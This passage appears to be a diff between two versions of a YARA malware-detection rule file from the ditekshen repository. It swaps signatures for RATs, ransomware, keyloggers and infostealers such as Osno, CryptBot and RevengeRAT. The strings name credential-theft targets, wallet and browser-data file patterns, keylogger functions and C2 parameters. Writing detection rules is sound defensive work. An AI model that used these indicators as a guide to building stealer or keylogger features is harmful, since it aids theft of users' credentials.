"\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii condition: - uint16(0)==0x5a4d and $mc and (2 of ($s*) or (1 of ($s*) and 1 of ($w*)) or 1 of ($w*)) + uint16(0)==0x5a4d and (7 of ($s*) or 3 of ($cnc*) or ($pdb and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gaudox : FILE +rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE { meta: - description = "Detects Gaudox RAT" - author = "ditekshen" - id = "c60ac433-20a1-5f01-9447-fa99621bd9e2" - date = "2024-09-06" - modified = "2024-09-06" + description = "Apocalypse infostealer payload" + author = "ditekSHen" + id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3883-L3893" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1598-L1615" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide - $s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide + $s1 = "OpenClipboard" fullword ascii + $s2 = "SendARP" fullword ascii + $s3 = "GetWebRequest" fullword ascii + $s4 = "DotNetGuard" fullword ascii + $s5 = "set_CreateNoWindow" fullword ascii + $s6 = "UploadFile" fullword ascii + $s7 = "GetHINSTANCE" fullword ascii + $s8 = "Kill" fullword ascii + $s9 = "GetProcesses" fullword ascii + $s10 = "get_PrimaryScreen" fullword ascii condition: uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Phobos : FILE +rule DITEKSHEN_MALWARE_Win_Osno : FILE { meta: - description = "Detects Phobos ransomware" - author = "ditekshen" - id = "7bf659ef-f2a1-5ee2-a334-c233e26a2526" - date = "2024-09-06" - modified = "2024-09-06" + description = "Osno ransomware and infostealer payload" + author = "ditekSHen" + id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3895-L3908" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bbf8eef0863e9d6423b3b0f938561b2be486b92b4f59b5d0b67f52dba536a582" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1617-L1652" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f" score = 75 - quality = 25 + quality = 73 tags = "FILE" strings: - $x1 = "\\\\?\\UNC\\\\\\e-" fullword wide - $x2 = "\\\\?\\ :" fullword wide - $x3 = "POST" fullword wide - $s1 = "ELVL" fullword wide - $s2 = /SUP\d{3}/ fullword wide - $s3 = { 41 31 47 ?? 41 2b } + $s1 = ".HolyGate+<>c+<<FinalBoss>" ascii + $s2 = /Osno(Keylogger|Stealer|Ransom)/ wide + $s3 = "password,executeWebhook('Account credentials" wide + $s4 = "-Name Osno -PropertyType" wide + $s5 = "process.env.hook" ascii + $s6 = "Stealer.JSON.JsonValue" ascii + $s7 = "<DetectBrowserss>b_" ascii + $s8 = "<TryGetDiscordPath>b_" ascii + $s9 = "antiVM" fullword ascii + $s10 = "downloadurl" fullword ascii + $s11 = "set_sPassword" fullword ascii + $txt0 = "{0} {1} .txt" fullword wide + $txt1 = "\\ScanningNetworks.txt" fullword wide + $txt2 = "\\SteamApps.txt" fullword wide + $txt3 = "-ErrorsLogs.txt" fullword wide + $txt4 = "-keylogs.txt" fullword wide + $txt5 = "Hardware & Soft.txt" fullword wide + $cnc0 = "/csharp/" ascii wide + $cnc1 = "token=" ascii wide + $cnc2 = "×tamp=" ascii wide + $cnc3 = "&session_id=" ascii wide + $cnc4 = "&aid=" ascii wide + $cnc5 = "&secret=" ascii wide + $cnc6 = "&api_key" ascii wide + $cnc7 = "&session_key=" ascii wide + $cnc8 = "&type=" ascii wide condition: - uint16(0)==0x5a4d and all of ($x*) and 1 of ($s*) + ( uint16(0)==0x5a4d and (6 of ($s*) or 4 of ($txt*) or (4 of ($s*) and 2 of ($txt*)))) or (7 of ($cnc*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ratty : FILE +rule DITEKSHEN_MALWARE_Win_Betabot : FILE { meta: - description = "Detects Ratty Java RAT" - author = "ditekshen" - id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f" - date = "2024-09-06" - modified = "2024-09-06" + description = "BetaBot payload" + author = "ditekSHen" + id = "377c500c-5727-5bea-ac46-cb69c868a607" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3910-L3929" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1654-L1666" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "/rat/RattyClient.class" ascii - $s2 = "/rat/ActiveConnection.class" ascii - $s3 = "/rat/attack/" ascii - $s4 = "/rat/gui/swing/Ratty" ascii - $s5 = "/rat/packet/PasswordPacket" ascii - $s6 = "/rat/packet/" ascii - $e1 = "/engine/Keyboard.class" ascii - $e2 = "/engine/IMouseListener.class" ascii - $e3 = "/engine/Screen$ResizeBehavior.class" ascii - $e4 = "/engine/fx/ISoundListener.class" ascii - $e5 = "/engine/net/TCPServer.class" ascii - $e6 = "/engine/noise/PerlinNoise.class" ascii + $s1 = "__restart" fullword ascii + $s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide + $s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide + $s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii + $s5 = "VirtualProtectEx" fullword ascii condition: - ( uint16(0)==0x5a4d or uint16(0)==0xcfd0 or uint16(0)==0x4b50) and (3 of ($s*) or all of ($e*)) + uint16(0)==0x5a4d and filesize <600KB and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Fatduke : FILE +rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE { meta: - description = "Detects FatDuke" + description = "WSHRAT keylogger plugin payload" author = "ditekSHen" - id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3" - date = "2024-09-06" - modified = "2024-09-06" + id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3931-L3946" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1668-L1685" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384" score = 75 quality = 75 tags = "FILE" + snort_sid = "920010-920012" + clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG" strings: - $s1 = "\\\\?\\Volume" fullword ascii - $s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii - $s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii - $s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii - $pattern = "()$^.*+?[]|\\-{},:=!" ascii - $b64 = "eyJjb25maWdfaWQiOi" wide + $s1 = "GET /open-keylogger HTTP/1.1" fullword wide + $s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide + $s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide + $s4 = "sendKeyLog" fullword ascii + $s5 = "saveKeyLog" fullword ascii + $s6 = "get_TotalKeyboardClick" fullword ascii + $s7 = "get_SessionMouseClick" fullword ascii + $pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii condition: - uint16(0)==0x5a4d and (3 of ($s*) or ($b64 and 2 of them ) or (#pattern>3 and 2 of them )) + uint16(0)==0x5a4d and filesize <100KB and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Miniduke : FILE +rule DITEKSHEN_MALWARE_Win_Revengerat : FILE { meta: - description = "Detects MiniDuke" + description = "RevengeRAT and variants payload" author = "ditekSHen" - id = "947cd414-d19d-5543-8961-94aef69cc94e" - date = "2024-09-06" - modified = "2024-09-06" + id = "7d725050-108c-54b5-978e-2dd2124f5b0f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3948-L3969" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1687-L1713" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f" score = 75 quality = 75 tags = "FILE" + snort_sid = "920000-920002" strings: - $s1 = "DefPipe" fullword ascii - $s2 = "term %5d" fullword ascii - $s3 = "pid %5d" fullword ascii - $s4 = "uptime %5d.%02dh" fullword ascii - $s5 = "login: %s\\%s" fullword ascii - $s6 = "Software\\Microsoft\\ApplicationManager" ascii - $s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 } - $net1 = "salesappliances.com" ascii - $net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii - $net3 = "http://10." ascii - $net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii - $net5 = "application/octet-stream" ascii - $net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii + $l1 = "Lime.Connection" fullword ascii + $l2 = "Lime.Packets" fullword ascii + $l3 = "Lime.Settings" fullword ascii + $l4 = "Lime.NativeMethods" fullword ascii + $s1 = "GetAV" fullword ascii + $s2 = "keepAlivePing!" fullword ascii wide + $s3 = "Revenge-RAT" fullword ascii wide + $s4 = "*-]NK[-*" fullword ascii wide + $s5 = "RV_MUTEX" fullword ascii wide + $s6 = "set_SendBufferSize" fullword ascii + $s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii + $s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii + $s9 = "\\RevengeRAT\\" ascii + $q1 = "Select * from AntiVirusProduct" fullword ascii wide + $q2 = "SELECT * FROM FirewallProduct" fullword ascii wide + $q3 = "select * from Win32_Processor" fullword ascii wide condition: - uint16(0)==0x5a4d and (5 of ($s*) or 4 of ($net*) or 7 of them ) + uint16(0)==0x5a4d and ((1 of ($l*) and 3 of ($s*)) or ( all of ($q*) and 3 of ($s*)) or 3 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE +rule DITEKSHEN_MALWARE_Win_TRAT : FILE { meta: - description = "Detects PolyGlotDuke" + description = "TRAT payload" author = "ditekSHen" - id = "01ac90db-35f6-5192-8630-81000573b4f9" - date = "2024-09-06" - modified = "2024-09-06" + id = "15f80970-6bc7-5e29-86d6-f7529a10d227" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3971-L3986" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1715-L1730" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.TRAT" strings: - $s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 } - $s2 = { 56 be ff ff ff ff 56 81 e6 7f } - $s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b } + $s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide + $s2 = "^7656119([0-9]{10})$" fullword wide + $s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii + $s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii + $s5 = "ProcessWindowStyle.Hidden" ascii + $s6 = "+<>c+<<ListCommands>" ascii + $s7 = "//B //Nologo *Y" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*)) or (2 of them and pe.exports("InitSvc")) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Guidlma : FILE +rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE { meta: - description = "Detects Guildma" + description = "CryptBot/Fugrafa stealer payload" author = "ditekSHen" - id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f" - date = "2024-09-06" - modified = "2024-09-06" + id = "248961dd-b98d-509b-92a0-1670b7687e25" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3988-L4006" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1732-L1766" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd" score = 75 - quality = 25 + quality = 69 tags = "FILE" + snort2_sid = "920110" + snort3_sid = "920108" + clamav_sig = "MALWARE.Win.Trojan.CryptBot" strings: - $v1_1 = "marxvxinhhm98.dll" fullword wide - $v1_2 = "marxvxinhhmxa.gif" fullword wide - $v1_3 = "marxvxinhhmxb.gif" fullword wide - $v1_4 = "c:\\programdata" fullword wide - $v1_5 = "\\tempa\\" fullword wide - $v2_1 = "C:\\Windows\\System32\\dllhost.exe" fullword ascii - $v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii - $v2_3 = "C:\\Users\\Public\\go" fullword ascii - $v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii - $v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii - $v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii + $s1 = "Username: %wS" fullword wide + $s2 = "Computername: %wS" fullword wide + $s3 = "/c rd /s /q %" wide + $s4 = "IP: N0t_IP" fullword wide + $s5 = "Country: N0t_Country" fullword wide + $s6 = "password-check" fullword ascii + $s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide + $s8 = "[ %wS ]" wide + $s9 = "EXE_PATH:" wide + $s10 = "Username (Computername):" wide + $s11 = "Operating system language:" wide + $s12 = "/index.php" wide + $f1 = "*ledger*.txt" fullword wide + $f2 = "*crypto*.xlsx" fullword wide + $f3 = "*private*.txt" fullword wide + $f4 = "*wallet*.dat" fullword wide + $f5 = "*pass*.txt" fullword wide + $f6 = "*bitcoin*.txt" fullword wide + $p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide + $p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide + $p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide + $pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase + $pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide + $pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide condition: - uint16(0)==0x5a4d and 3 of ($v1*) or 5 of ($v2*) + uint16(0)==0x5a4d and ((5 of ($s*) and 1 of ($p*)) or (4 of ($s*) and 1 of ($f*) and 1 of ($p*)) or (2 of ($pattern*) and 3 of ($s*)) or (#pattern1>6 and (2 of ($s*) or 1 of ($p*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Cybergate : FILE +rule DITEKSHEN_MALWARE_Win_Matiex : FILE { meta: - description = "Detects CyberGate/Spyrat/Rebhip RTA" + description = "Matiex/XetimaLogger keylogger payload" author = "ditekSHen" - id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff" - date = "2024-09-06" - modified = "2024-09-06" + id = "61803e0c-8f6a-5ded-855a-ff26eed1384f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4008-L4026" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1768-L1788" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2" score = 75 - quality = 46 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger" strings: - $s1 = "UnitInjectLibrary" ascii - $s2 = "TLoader" fullword ascii - $s3 = "\\\\.\\SyserDbgMsg" fullword ascii - $s4 = "\\\\.\\SyserBoot" fullword ascii - $s5 = "\\signons" ascii - $s6 = "####@####" ascii - $s7 = "XX-XX-XX-XX" fullword ascii - $s8 = "EditSvr" ascii - $s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii - $s10 = "L$_RasDefaultCredentials#0" fullword ascii - $s11 = "password" nocase ascii + $id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide + $s1 = "StartKeylogger" fullword ascii + $s2 = "_KeyboardLoggerTimer" ascii + $s3 = "_ScreenshotLoggerTimer" ascii + $s4 = "_VoiceRecordLogger" ascii + $s5 = "_ClipboardLoggerTimer" ascii + $s6 = "get_logins" fullword ascii + $s7 = "get_processhackerFucked" fullword ascii + $s8 = "_ThePSWDSenders" fullword ascii + $pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii condition: - uint16(0)==0x5a4d and 8 of them + uint16(0)==0x5a4d and ($id or 4 of ($s*) or ($pdb and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE +rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE { meta: - description = "Detects WSHRAT JS variants" + description = "IAmTheKing Keylogger payload" author = "ditekSHen" - id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b" - date = "2024-09-06" - modified = "2024-09-06" + id = "f9c84241-6db2-5243-9bea-2165104cb0c3" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4028-L4045" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1790-L1805" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger" strings: - $charset_full = "us-ascii" nocase ascii - $charset_begin = "\"us-\"" nocase ascii - $charset_end = "Array(97,115,99,105,105)" nocase ascii - $wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii - $wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii - $wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii - $s1 = "function(){return" ascii - $s2 = "}catch(err){" ascii - $s3 = "{item: \"bin.base64\"}" nocase ascii - $s4 = "* 1].item =" ascii + $s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii + $s2 = "[TITLE:]" fullword ascii + $s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii + $s4 = "[DATA]:" fullword ascii + $s5 = "[BK]" fullword ascii + $s6 = "Log.txt" fullword ascii + $s7 = "sonme hting is wrong x" fullword ascii condition: - filesize <400KB and ($charset_full or ($charset_begin and $charset_end)) and 2 of ($wsc_object*) and 3 of ($s*) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Asyncrat : FILE +rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE { meta: - description = "Detects AsyncRAT" + description = "IAmTheKing screen capture payload" author = "ditekSHen" - id = "6465b50d-8f1a-5c09-84fd-cd1e5994e68f" - date = "2024-09-06" - modified = "2024-09-06" + id = "ba385194-9578-568c-b908-bc4fc742e52e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4047-L4074" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "073d4a8667fb1a48bf2bd503a551d7f78e38a6066feedc646d92c27fb7201fca" - score = 60 - quality = 35 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1807-L1821" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba" + score = 75 + quality = 75 tags = "FILE" strings: - $x1 = "AsyncRAT" fullword ascii - $x2 = "AsyncRAT 0." wide - $x3 = /AsyncRAT\s[0-9]\.[0-9]\.[0-9][A-Z]/ fullword wide - $s1 = "/create /sc onlogon /rl highest /tn" fullword wide - $s2 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide - $s3 = "{{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}" fullword wide - $s4 = "Stub.exe" fullword ascii wide - $s5 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH" ascii wide - $s6 = "VirtualBox" fullword ascii wide - $s7 = "/target:winexe /platform:x86 /optimize+" fullword ascii wide - $s8 = "Win32_ComputerSystem" ascii wide - $s9 = "Win32_Process Where ParentProcessID=" ascii wide - $s10 = "etirWgeR.llehShsW" ascii wide - $s11 = "usbSpread" fullword ascii wide - $cnc1 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" fullword ascii wide - $cnc2 = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" fullword ascii wide - $cnc3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" fullword ascii wide - $cnc4 = "POST / HTTP/1.1" fullword ascii wide + $s1 = "@MyScreen.jpg" fullword wide + $s2 = "DISPLAY" fullword wide + $s3 = ".?AVCImage@ATL@@" fullword ascii + $s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii + $s5 = ".?AVImage@Gdiplus@@" fullword ascii + $s6 = ".?AVBitmap@Gdiplus@@" fullword ascii + $s7 = ".?AVCAtlException@ATL@@" fullword ascii condition: - (( uint16(0)==0x5a4d and filesize <4000KB) and (1 of ($x*) or 6 of ($s*) or all of ($cnc*) or (4 of ($s*) and 2 of ($cnc*)))) or (1 of ($x*) or 6 of ($s*) or all of ($cnc*) or (4 of ($s*) and 2 of ($cnc*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Quilclipper +rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE { meta: - description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script" + description = "IAmTheKing King Of Hearts payload" author = "ditekSHen" - id = "bd23ec5a-f21a-5133-a77a-de2615933b82" - date = "2024-09-06" - modified = "2024-09-06" + id = "95c73ec0-75b0-5d46-87da-b30feb170716" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4076-L4094" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1823-L1843" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55" score = 75 quality = 75 - tags = "" + tags = "FILE" strings: - $cnc1 = "QUILCLIPPER by" ascii - $cnc2 = "/ UserName:" ascii - $cnc3 = "/ System:" ascii - $s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii - $s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii - $s3 = "CASE BITROTATE" ascii - $s4 = "CASE BITXOR" ascii - $s5 = "CLIP( FUNC_" ascii - $s6 = "CLIPPUT (" ascii - $s7 = "FUNC _CLIPPUTFILE(" ascii - $s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii + $s1 = "write info fail!!! GetLastError-->%u" fullword ascii + $s2 = "LookupAccountSid Error %u" fullword ascii + $s3 = "CreateServiceErrorID:%d" fullword ascii + $s4 = "In ControlServiceErrorID:%d" fullword ascii + $s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii + $s6 = "Content-Disposition: form-data; name=\"%s\"; 